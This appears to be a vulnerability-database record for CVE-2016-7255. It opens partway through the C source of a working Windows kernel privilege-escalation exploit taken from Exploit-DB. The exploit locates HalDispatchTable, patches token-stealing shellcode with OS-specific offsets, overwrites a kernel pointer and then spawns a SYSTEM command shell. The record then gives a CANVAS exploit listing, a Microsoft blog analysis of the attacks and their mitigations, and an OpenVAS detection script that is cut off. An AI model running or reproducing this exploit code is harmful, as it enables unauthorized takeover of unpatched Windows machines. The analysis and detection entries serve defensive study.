\r\n\t// 0xfff - 0xd50 = 0x2af space\r\n\r\n\tmemcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));\r\n\treturn 0xffffffffffd00d50;\r\n}\r\n\r\nUINT64 GetHalDispatchTable() {\r\n PCHAR KernelImage;\r\n SIZE_T ReturnLength;\r\n HMODULE hNtDll = NULL;\r\n UINT64 HalDispatchTable;\r\n HMODULE hKernelInUserMode = NULL;\r\n PVOID KernelBaseAddressInKernelMode;\r\n NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;\r\n PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;\r\n\r\n hNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n if (!hNtDll) {\r\n printf(\"\\t\\t\\t[-] Failed To Load NtDll.dll: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, \"NtQuerySystemInformation\");\r\n\r\n if (!NtQuerySystemInformation) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);\r\n\r\n // Allocate the Heap chunk\r\n pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),\r\n HEAP_ZERO_MEMORY,\r\n ReturnLength);\r\n\r\n if (!pSystemModuleInformation) {\r\n printf(\"\\t\\t\\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n NtStatus = NtQuerySystemInformation(SystemModuleInformation,\r\n pSystemModuleInformation,\r\n ReturnLength,\r\n &ReturnLength);\r\n\r\n if (NtStatus != STATUS_SUCCESS) {\r\n printf(\"\\t\\t\\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;\r\n KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\\\') + 1;\r\n\r\n printf(\"\\t\\t\\t[+] Loaded Kernel: %s\\n\", KernelImage);\r\n printf(\"\\t\\t\\t[+] Kernel Base Address: 0x%p\\n\", KernelBaseAddressInKernelMode);\r\n \r\n hKernelInUserMode = LoadLibraryA(KernelImage);\r\n\r\n if (!hKernelInUserMode) {\r\n printf(\"\\t\\t\\t[-] Failed To Load Kernel: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n // This is still in user mode\r\n HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, \"HalDispatchTable\");\r\n\r\n if (!HalDispatchTable) {\r\n printf(\"\\t\\t\\t[-] Failed Resolving HalDispatchTable: 0x%X\\n\", GetLastError());\r\n exit(EXIT_FAILURE);\r\n }\r\n else {\r\n HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;\r\n\r\n // Here we get the address of HapDispatchTable in Kernel mode\r\n HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);\r\n printf(\"\\t\\t\\t[+] HalDispatchTable: 0x%llx\\n\", HalDispatchTable);\r\n }\r\n\r\n HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);\r\n\r\n if (hNtDll) {\r\n FreeLibrary(hNtDll);\r\n }\r\n\r\n if (hKernelInUserMode) {\r\n FreeLibrary(hKernelInUserMode);\r\n }\r\n\r\n hNtDll = NULL;\r\n hKernelInUserMode = NULL;\r\n pSystemModuleInformation = NULL;\r\n\r\n return HalDispatchTable;\r\n}\r\n\r\nint __cdecl main(int argc, char** argv)\r\n{\r\n\tTCHAR pre_username[256];\r\n\tTCHAR post_username[256];\r\n\tDWORD size = 256;\r\n\tULONG Interval = 0;\r\n\tHMODULE hNtDll = NULL;\r\n\tUINT retval;\r\n UINT64 overwrite_address;\r\n int overwrite_offset;\r\n \r\n // define operating system version specific variables\r\n unsigned char sc_KPROCESS;\r\n unsigned int sc_TOKEN;\r\n unsigned int sc_APLINKS;\r\n\tint osversion;\r\n\r\n\tif (argc != 2) {\r\n\t\tprintf(\"Please enter an OS version\\n\");\r\n\t\tprintf(\"The following OS'es are supported:\\n\");\r\n\t\tprintf(\"\\t[*] 7 - Windows 7\\n\");\r\n\t\tprintf(\"\\t[*] 81 - Windows 8.1\\n\");\r\n\t\tprintf(\"\\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\\n\");\r\n\t\tprintf(\"\\t[*] 12 - Windows 2012 R2\\n\");\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"\\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\t\r\n\tosversion = _strtoui64(argv[1], NULL, 10);\r\n\t\r\n if(osversion == 7) \r\n {\r\n // the target machine's OS is Windows 7 SP1\r\n printf(\" [+] Windows 7 SP1\\n\");\r\n sc_KPROCESS = 0x70;\t\t\t// dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x80;\t\t\t// dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)\r\n sc_APLINKS = 0x188;\t\t// dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = GetHalDispatchTable(); // HalDispatchTable\r\n overwrite_offset = 0x8; \t\t\t\t// QueryIntervalProfile \r\n }\r\n\telse if(osversion == 81)\r\n {\r\n // the target machine's OS is Windows 8.1\r\n printf(\" [+] Windows 8.1\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; \t// dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 10)\r\n {\r\n // the target machine's OS is Windows 10 prior to build 14393\r\n printf(\" [+] Windows 10\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n\telse if(osversion == 12)\r\n {\r\n // the target machine's OS is Windows 2012 R2\r\n printf(\" [+] Windows 2012 R2\\n\");\r\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\r\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\r\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\r\n \r\n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\r\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\r\n }\r\n // in case the OS version is not any of the previously checked versions\r\n else\r\n {\r\n printf(\" [-] Unsupported version\\n\");\r\n printf(\" [*] Affected 64-bit operating systems\\n\");\r\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\r\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\r\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\r\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\r\n return -1;\r\n }\r\n \r\n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\r\n GetUserName(pre_username, &size);\r\n\tprintf(\"Current Username: %s\\n\", pre_username);\r\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\r\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\r\n\tprintf(\"Enter to continue...\\n\");\r\n\tgetchar();\r\n\r\n\tdo\r\n\t{\r\n\t\tor_address_value_4((void*)PML4_SELF_REF);\r\n\t} while (FALSE);\r\n\r\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\r\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\r\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\r\n\t\r\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\r\n\r\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\r\n\tDWORD pid = GetCurrentProcessId();\r\n \r\n /* Shellcode Patching !! */\r\n\tchar *p = shellcode;\r\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\r\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\r\n\r\n\tp += 12; // Patch shellcode with original value in the Overwrite address\r\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\r\n\r\n\tp += 12; // To patch the PID of our process\r\n\t\r\n\t*(DWORD *)p = (DWORD)pid;\r\n \r\n p += 17;\r\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\r\n \r\n p += 7;\r\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n p += 20;\r\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\r\n \r\n UINT64 shellcode_va = store_shellcode_in_hal();\r\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\r\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\r\n\t\r\n\tif (osversion == 7){\r\n\t\t// Exploit Win7.1\r\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\r\n\r\n\t\tif (!hNtDll) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\r\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\r\n\r\n\t\tif (!NtQueryIntervalProfile) {\r\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\t\r\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\r\n\t}\r\n\r\n\t\r\n\twhile (1) {\r\n\t\tsize = 256;\r\n\t\tGetUserName(post_username, &size);\r\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\r\n\t}\r\n\tSleep(2000);\r\n\tsystem(\"cmd.exe\");\r\n\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41015/"}], "canvas": [{"lastseen": "2017-01-11T18:07:43", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0099", "CVE-2016-7255"], "edition": 1, "description": "**Name**| ms16_135 \n---|--- \n**CVE**| CVE-2016-0099 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS16-135 SetWindowLongPtr Vulnerability \n**Notes**| CVE Name: CVE-2016-0099 \nVENDOR: Microsoft \nNotes: \nThe vulnerable (and now patched) function is actually xxxNextWindow(), but since \nGoogle mentioned SetWindowLongPtr() in their release, we use that name here. \n \nOlder systems are definitely vulnerable, but we have developed/tested on Win10 Anniversary Update for now. \n \nRepeatability: Infinite \nReferences: ['https://technet.microsoft.com/en-us/library/security/ms16-135.aspx', 'https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255'] \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255 \n\n", "modified": "2016-11-10T02:00:09", "published": "2016-11-10T02:00:09", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms16_135", "id": "MS16_135", "type": "canvas", "title": "Immunity Canvas: MS16_135", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "bulletinFamily": "blog", "cvelist": ["CVE-2016-7855", "CVE-2016-7256", "CVE-2016-7255"], "description": "Cyberattacks involving zero-day exploits happen from time to time, affecting different platforms and applications. Over the years, Microsoft security teams have been working extremely hard to address these attacks. While delivering innovative solutions like [Windows Defender Application Guard](<https://blogs.windows.com/msedgedev/2016/09/27/application-guard-microsoft-edge>), which provides a safe virtualized layer for the Microsoft Edge browser, and [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>), a cloud-based service that identifies breaches using data from built-in Windows 10 sensors, we are hardening the Windows platform with mitigation techniques that can stop exploits of newly discovered and even undisclosed vulnerabilities. As Terry Myerson reiterated in his [blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), we take our commitment to security innovation very seriously.\n\nA key takeaway from the detonation of zero-day exploits is that each instance represents a valuable opportunity to assess how resilient a platform can be\u2014how mitigation techniques and additional defensive layers can keep cyberattacks at bay while vulnerabilities are being fixed and patches are being deployed. Because it takes time to hunt for vulnerabilities and it is virtually impossible to find all of them, such security enhancements can be critical in preventing attacks based on zero-day exploits.\n\nIn this blog, we look at two recent kernel-level zero-day exploits used by multiple activity groups. These kernel-level exploits, based on CVE-2016-7255 and CVE-2016-7256 vulnerabilities, both result in elevation of privileges. Microsoft has promptly fixed the mentioned vulnerabilities in November 2016. However, we are testing the exploits against mitigation techniques delivered in August 2016 with Windows 10 Anniversary Update, hoping to see how these techniques might fare against future zero-day exploits with similar characteristics.\n\n \n\n**CVE** | **Microsoft Update** | **Exploit Type** | **Mitigation in Anniversary Update** \n---|---|---|--- \nCVE-2016-7255 | [MS16-135 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-135>) | Win32k Elevation of Privilege Exploit | Strong validation of tagWND structure \nCVE-2016-7256 | [MS16-132 (Nov, 2016)](<https://technet.microsoft.com/library/security/MS16-132>) | Open Type Font Exploit | Isolated Font Parsing (AppContainer) \nStronger validation in font parsing \n \n \n\n## CVE-2016-7255 exploit: Win32k elevation of privilege\n\nIn October 2016, the STRONTIUM attack group launched a spear-phishing campaign targeting a small number of think tanks and nongovernmental organizations in the United States. The campaign, also discussed in [the previously mentioned blog post](<https://blogs.technet.microsoft.com/mmpc/2016/11/01/our-commitment-to-our-customers-security/>), involved the use of the exploit for CVE-2016-7255 in tandem with an exploit for the Adobe Flash Player vulnerability CVE-2016-7855.\n\nThe attack group used the Flash exploit to take advantage of a use-after-free vulnerability and access targeted computers. They then leveraged the type-confusion vulnerability in _win32k.sys_ (CVE-2016-7255) to gain elevated privileges.\n\n### Abusing the tagWND.strName kernel structure\n\nIn this section, we\u2019ll go through the internals of the specific exploit for CVE-2016-7255 crafted by the attacker. We will show how mitigation techniques provided customers with preemptive protection from the exploit, even before the release of the specific update fixing the vulnerability.\n\n\n\n_Figure 1. Exploit and shellcode phases of this attack _\n\n \n\nModern exploits often rely on read-write (RW) primitives to achieve code execution or gain additional privileges. For this exploit, attackers acquire RW primitives by corrupting _tagWND.strName_ kernel structure. This exploit method is a trend discussed in security conferences and visible to those who investigated actual attacks. For example, we detailed similar findings in a [presentation](<https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/OhFlorio-VB2015.pdf>) about the Duqu 2.0 exploit at Virus Bulletin 2015.\n\nBy reverse engineering its code, we found that the Win32k exploit used by STRONTIUM in October 2016 reused the exact same method. The exploit, after the initial Win32k vulnerability, corrupts _tagWND.strName_ structure and uses _SetWindowTextW_ to write arbitrary content anywhere in kernel memory.\n\n\n\n_Figure 2. SetWindowTextW as a write primitive_\n\n \n\nThe exploit abuses this API call to overwrite data of current processes and copy token privileges of the _SYSTEM_. If successful, the exploit enables the victim process\u2014_iexplore.exe_, in this example\u2014to execute with elevated privileges.\n\n\n\n_Figure 3. Internet Explorer with SYSTEM privileges_\n\n \n\n### Mitigating tagWND exploits with stronger validation\n\nTo mitigate the Win32k exploit and similar exploits, the Windows Offensive Security Research Team (OSR) introduced techniques in the Windows 10 Anniversary Update that prevent abusive use of _tagWND.strName_. This mitigation performs additional checks for the base and length fields, making sure that they are in the expected virtual address ranges and are not usable for RW primitives. In our tests on Anniversary Update, exploits using this method to create an RW primitive in the kernel are ineffective. These exploits instead cause exceptions and subsequent blue screen errors.\n\n\n\n_Figure 4. Windows 10 Anniversary Update mitigation on a common kernel write primitive_\n\n \n\nWith the upcoming Windows 10 Creators Update, [Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) introduces numerous forms of generic kernel exploit detection for deeper visibility into targeted attacks leveraging zero-day exploits. Technical details about the enhanced sensor will be shared in a forthcoming blog post.\n\n## CVE-2016-7256 exploit: Open type font elevation of privilege\n\nAs early as June 2016, unidentified actors began to use an implant detected as \u201cHenkray\u201d in low-volume attacks primarily focused on targets in South Korea. Later, in November 2016, these attackers were detected exploiting a flaw in the Windows font library (CVE-2016-7256) to elevate privileges and install the Henkray backdoor on targeted computers with older versions of Windows.\n\nThe font samples found on affected computers were specifically manipulated with hardcoded addresses and data to reflect actual kernel memory layouts. This indicates the likelihood that a secondary tool dynamically generated the exploit code at the time of infiltration.\n\n\n\n_Figure 5. Auto-generation of font file with exploit_\n\n \n\nThis secondary executable or script tool, which has not been recovered, appears to prepare and drop the font exploit, calculating and preparing the hardcoded offsets needed to exploit the kernel API and the kernel structures on the targeted system. Through deep forensic inspection of the binary data found in samples, we extracted all the hardcoded offsets and ascertained the kernel version targeted by this exploit: Windows 8 64-bit.\n\n### Function table corruption for initial code execution\n\nThe font exploit uses _fa_Callbacks_ to corrupt the function table and achieve initial code execution. The callback is called from the CFF parsing function. The following snippet shows a corrupted _ftell_ pointer to a _nt!qsort+0x39_ location in kernel code.\n\n\n\n_Figure 6. fa_Callbacks table corruption_\n\n \n\nThe following snippet shows the code that calls the corrupt function pointer leading to a kernel ROP chain.\n\n\n\n_Figure 7. fa_Callbacks.ftell function call code_\n\n \n\nWhen the corrupted function is called, the control jumps to the first ROP gadget at nt!qsort+0x39, which adjusts stack pointer and initializes some register values from stack values.\n\n\n\n_Figure 8. First ROP gadget_\n\n \n\nAfter the first gadget, the stack points to a kernel ROP chain which calls to _ExAllocatePoolWithTag_ call to reserve shellcode memory. Another ROP gadget will copy the first 8 bytes of the stage 1 shellcode to the allocated memory.\n\n\n\n_Figure 9. Copying the stage 1 shellcode_\n\n \n\n### Shellcode and privilege escalation\n\nThe stage 1 shellcode is very small. Its main function is to copy the main body of the shellcode to newly allocated memory and run them with a JMP RAX control transfer.\n\n\n\n_Figure 10. Stage 1 shellcode_\n\n \n\nThe main shellcode runs after the copy instructions. The main shellcode\u2014also a small piece of code\u2014performs a well-known token-stealing technique. It then copies the token pointer from a SYSTEM process to the target process, achieving privilege escalation. Both the SYSTEM process and target process PIDs, as well as certain offsets for the kernel APIs needed by the shellcode, are hardcoded in the font sample.\n\n\n\n_Figure 11. Token replacement technique_\n\n \n\n### Mitigating font exploits with AppContainer\n\nWhen opening the malicious font sample on Windows 10 Anniversary Update, font parsing happens completely in AppContainer instead of the kernel. AppContainer provides an isolated sandbox that effectively prevents font exploits (among other types of exploits) from gaining escalated privileges. The isolated sandbox considerably reduces font parsing as an attack surface.\n\n\n\n_Figure 12. AppContainer protects against untrusted fonts in Windows 10 Anniversary Update_\n\n \n\nWindows 10 Anniversary Update also includes additional validation for font file parsing. In our tests, the specific exploit code for CVE-2016-7256 simply fails these checks and is unable to reach vulnerable code.\n\n\n\n_Figure 13. Windows 10 font viewer error_\n\n \n\n## Conclusion: Fighting the good fight with exploit mitigation and layered detection\n\nWhile fixing a single-point vulnerability helps neutralize a specific bug, Microsoft security teams continue to look into opportunities to introduce more and more mitigation techniques. Such mitigation techniques can break exploit methods, providing a medium-term tactical benefit, or close entire classes of vulnerabilities for long-term strategic impact.\n\nIn this article, we looked into recent attack campaigns involving two zero-day kernel exploits. We saw how exploit mitigation techniques in Windows 10 Anniversary Update, which was released months before these zero-day attacks, managed to neutralize not only the specific exploits but also their exploit methods. As a result, these mitigation techniques are significantly reducing attack surfaces that would have been available to future zero-day exploits.\n\nBy delivering these mitigation techniques, we are increasing the cost of exploit development, forcing attackers to find ways around new defense layers. Even the simple tactical mitigation against popular RW primitives forces the exploit authors to spend more time and resources in finding new attack routes. By moving font parsing code to an isolated container, we significantly reduce the likelihood that font bugs are used as vectors for privilege escalation.\n\nIn addition to the techniques mentioned in this article, Windows 10 Anniversary Update introduced [many other mitigation techniques](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) in core Windows components and the Microsoft Edge browser, helping protect customers from entire classes of exploits for very recent and even undisclosed vulnerabilities.\n\nFor effective post-breach detection, including cover for the multiple stages of attacks described in this blog post, sign up for Window Defender ATP. The service leverages built-in sensors to raise alerts for exploits and other attack activity, providing corresponding threat intelligence. Customers interested in the Windows Defender ATP post-breach detection solution can find more information [here](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>).\n\n_Microsoft would like to thank [KrCERT](<https://www.krcert.or.kr/>) for their collaboration in protecting customers and for providing the sample for CVE-2016-7256._\n\n \n\n_Matt Oh and Elia Florio, __Windows Defender ATP Research Team_\n\n \n\n_Updates:_\n\nJan 18, 2017 - Corrected the spelling of Henkray backdoor.", "modified": "2017-01-13T21:28:49", "published": "2017-01-13T21:28:49", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/", "id": "MMPC:11F96360F6FFA25D4AC7028A2E9CAA9D", "title": "Hardening Windows 10 with zero-day exploit mitigations", "type": "mmpc", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-06-10T19:47:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7246", "CVE-2016-7218", "CVE-2016-7214", "CVE-2016-7255", "CVE-2016-7215"], "description": "This host is missing a important security\n update according to Microsoft Bulletin MS16-135", "modified": "2020-06-08T00:00:00", "published": "2016-11-09T00:00:00", "id": "OPENVAS:1361412562310809092", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809092", "type": "openvas", "title": "Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809092\");\n script_version(\"2020-06-08T14:40:48+0000\");\n script_cve_id(\"CVE-2016-7214\", \"CVE-2016-7215\", \"CVE-2016-7218\", \"CVE-2016-7246\",\n \"CVE-2016-7255\");\n script_bugtraq_id(92835);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-08 14:40:48 +0000 (Mon, 08 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-11-09 10:09:34 +0530 (Wed, 09 Nov 2016)\");\n script_name(\"Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (3199135)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a important security\n update according to Microsoft Bulletin MS16-135\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - A kernel Address Space Layout Randomization (ASLR) bypass error.\n\n - The windows kernel-mode driver fails to properly handle objects in memory.\n\n - The windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to retrieve the memory address of a kernel object, run arbitrary code\n in kernel mode and to log on to an affected system and runs a specially crafted\n application that could exploit the vulnerabilities and take control of an\n affected system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 Version 1511 x32/x64\n\n - Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows 7 x32/x64 Service Pack 1 and prior\n\n - Microsoft Windows Vista x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Service Pack 1 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/kb/3199135\");\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/en-us/library/security/ms16-135\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(winVista:3, win7:2, win7x64:2, win2008:3, win2008r2:2, winVistax64:3, win2008x64:3,\n win2012:1, win2012R2:1, win8_1:1, win8_1x64:1, win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Win32k.sys\");\nbrVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\drivers\\Bowser.sys\");\nif(!winVer && !brVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"6.0.6002.19706\"))\n {\n Vulnerable_range1 = \"Less than 6.0.6002.19706\";\n VULN1 = TRUE ;\n }\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24028\"))\n {\n Vulnerable_range1 = \"6.0.6002.23000 - 6.0.6002.24028\";\n VULN1 = TRUE ;\n }\n else if(version_is_less(version:brVer, test_version:\"6.0.6002.19698\"))\n {\n Vulnerable_range2 = \"Less than 6.0.6002.19698\";\n VULN2 = TRUE ;\n }\n else if(version_in_range(version:brVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24020\"))\n {\n Vulnerable_range2 = \"6.0.6002.23000 - 6.0.6002.24020\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.1.7601.23567\"))\n {\n Vulnerable_range2 = \"Less than 6.1.7601.23567\";\n VULN2 = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2012:1) > 0 && brVer)\n{\n if(version_is_less(version:brVer, test_version:\"6.2.9200.22004\"))\n {\n Vulnerable_range2 = \"Less than 6.2.9200.22004\";\n VULN2 = TRUE ;\n 